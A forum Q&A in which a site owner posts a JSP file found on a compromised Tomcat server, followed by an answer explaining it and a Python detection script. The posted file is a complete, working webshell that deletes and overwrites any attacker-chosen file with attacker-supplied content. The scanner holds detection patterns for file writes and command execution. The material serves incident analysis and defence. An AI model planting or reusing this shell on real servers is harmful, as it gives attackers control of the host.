What is this code doing


Question


I have a web application which has been recently exploited. The server is Tomcat 7.0.42. I have found files on the server which I haven't uploaded. Do you know why they are appearing? Here I show you the contents of one of these files; can anybody tell me what it is trying to do?

<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>

<%-- The write logic only runs when the request carries act=yoco; any other request just renders the form below. --%>
<% int i=0; String method=request.getParameter("act"); if(method!=null && method.equals("yoco")) {
    String url=request.getParameter("url");     // path of the file to create or overwrite, chosen by the sender
    String text=request.getParameter("smart");  // bytes to write into that file, also chosen by the sender
    File f=new File(url);
    if(f.exists()) {
        f.delete();   // an existing file at that path is removed first so it can be replaced
    }
    try{
        OutputStream o=new FileOutputStream(f);
        o.write(text.getBytes());
        o.close();
    } catch (Exception e) {
        i++;
    %>0<%            // the response body contains "0" when the write failed
    }
}
if(i==0){
    %>1<%            // and "1" when nothing failed (also when act was not "yoco")
}%>
<%-- The form posts back to this same JSP; the "url" field is pre-filled with the web root returned by getRealPath("/"). --%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url">
<br>
<textarea rows="20" cols="80" name="smart"></textarea>
<%-- The post was cut off after the textarea; the closing tags and submit button below only complete the form. --%>
<br>
<input type="submit">
</form>

Answer


This looks like a rootkit providing remote control for attackers. They are making a form post to the same JSP servlet. When the POST request is received, the parameter values sent to it are held and processed:

String url=request.getParameter("url");
String text=request.getParameter("smart");


Notice that the value received via the parameter url is held in a variable url. They then check to make sure the parameter value does exist as a file before deleting it, using:

File f=new File(url);
if(f.exists()) {
   f.delete();
}


Finally, the second parameter, smart, is held in the variable text. This is then used as the content of a new file created using the parameter url as the file path.

 OutputStream o=new FileOutputStream(f);
 o.write(text.getBytes());
 o.close();
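As an added example, not part of the question or the answer above, the following Python script applies the answer's reasoning mechanically to a deployed Tomcat tree: it marks a JSP as suspicious when a value read with request.getParameter flows, directly or through a java.io.File variable, into a File constructor, a delete() call, a FileOutputStream write, or a process launch. The regular-expression "taint" rules, the finding labels and the two embedded JSP samples are assumptions made for this illustration (the first sample is the shell from the question, trimmed to its scriptlet; the second is a constructed benign page).

```python
"""Triage helper: flag JSP files whose request parameters reach file or process sinks.

Added example for illustration; not code from the original question or answer.
The rules below are assumptions tuned to catch the one-file uploader posted in
the question and similar shells, not a complete webshell detector.
"""
import re
from pathlib import Path

# Source: a request parameter assigned to a local String variable.
PARAM_SRC = re.compile(
    r'String\s+(\w+)\s*=\s*request\.getParameter\(\s*"([^"]*)"\s*\)')
# Propagation: "File f = new File(url)" makes f as attacker-controlled as url.
FILE_FROM = re.compile(r'File\s+(\w+)\s*=\s*new\s+File\s*\(\s*(\w+)\s*\)')
# Sinks, keyed by the label reported to the analyst; group 1 is the variable used.
SINKS = {
    "attacker-chosen file path": re.compile(r'new\s+File\s*\(\s*(\w+)\s*\)'),
    "attacker-chosen file deleted": re.compile(r'\b(\w+)\.delete\s*\(\s*\)'),
    "attacker-chosen content written": re.compile(
        r'\.write\s*\(\s*(\w+)\.getBytes\s*\(\s*\)\s*\)'),
    "attacker-chosen command executed": re.compile(
        r'(?:Runtime\.getRuntime\(\)\.exec|new\s+ProcessBuilder)\s*\(\s*(\w+)'),
}


def analyze_jsp(source: str) -> dict:
    """Return the parameters a JSP reads and the sinks those values reach."""
    tainted = {}  # variable name -> request parameter it was read from
    for var, param in PARAM_SRC.findall(source):
        tainted[var] = param
    # A single propagation pass covers the "File f = new File(url)" idiom.
    for var, arg in FILE_FROM.findall(source):
        if arg in tainted:
            tainted[var] = tainted[arg]
    findings = []
    for label, pattern in SINKS.items():
        for arg in pattern.findall(source):
            if arg in tainted:
                findings.append(f'{label} via parameter "{tainted[arg]}"')
    return {
        "parameters": sorted(set(tainted.values())),
        "findings": sorted(set(findings)),
        "suspicious": bool(findings),
    }


def scan_dir(root: str) -> dict:
    """Walk a webapp tree (for example $CATALINA_BASE/webapps) and report suspicious JSPs."""
    hits = {}
    for path in Path(root).rglob("*.jsp"):
        report = analyze_jsp(path.read_text(encoding="utf-8", errors="replace"))
        if report["suspicious"]:
            hits[str(path)] = report["findings"]
    return hits


# Constructed sample 1: the shell from the question, reduced to its scriptlet.
WEBSHELL_SAMPLE = r'''<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.FileOutputStream"/>
<% String method=request.getParameter("act");
if(method!=null && method.equals("yoco")) {
    String url=request.getParameter("url");
    String text=request.getParameter("smart");
    File f=new File(url);
    if(f.exists()) { f.delete(); }
    OutputStream o=new FileOutputStream(f);
    o.write(text.getBytes());
    o.close();
} %>'''

# Constructed sample 2: a benign page that reads a parameter but opens only a fixed file.
BENIGN_SAMPLE = r'''<%@ page language="java" pageEncoding="UTF-8"%>
<%@ page import="java.io.File" %>
<% String name=request.getParameter("name");
File cfg=new File(application.getRealPath("/WEB-INF/app.properties"));
out.println("Hello " + (name == null ? "guest" : name.replace("<", "&lt;"))); %>'''


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, findings in scan_dir(sys.argv[1]).items():
            print(path, findings)
    else:
        print(analyze_jsp(WEBSHELL_SAMPLE))
```

Run it against the webapps directory of the compromised instance and compare every hit against the file list of the WAR you actually deployed; anything not in the inventory is the attacker's. The Tomcat access log is the other place to look: because the shell posts to itself with act=yoco, POST requests to a .jsp carrying that query string show which client used it and when.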

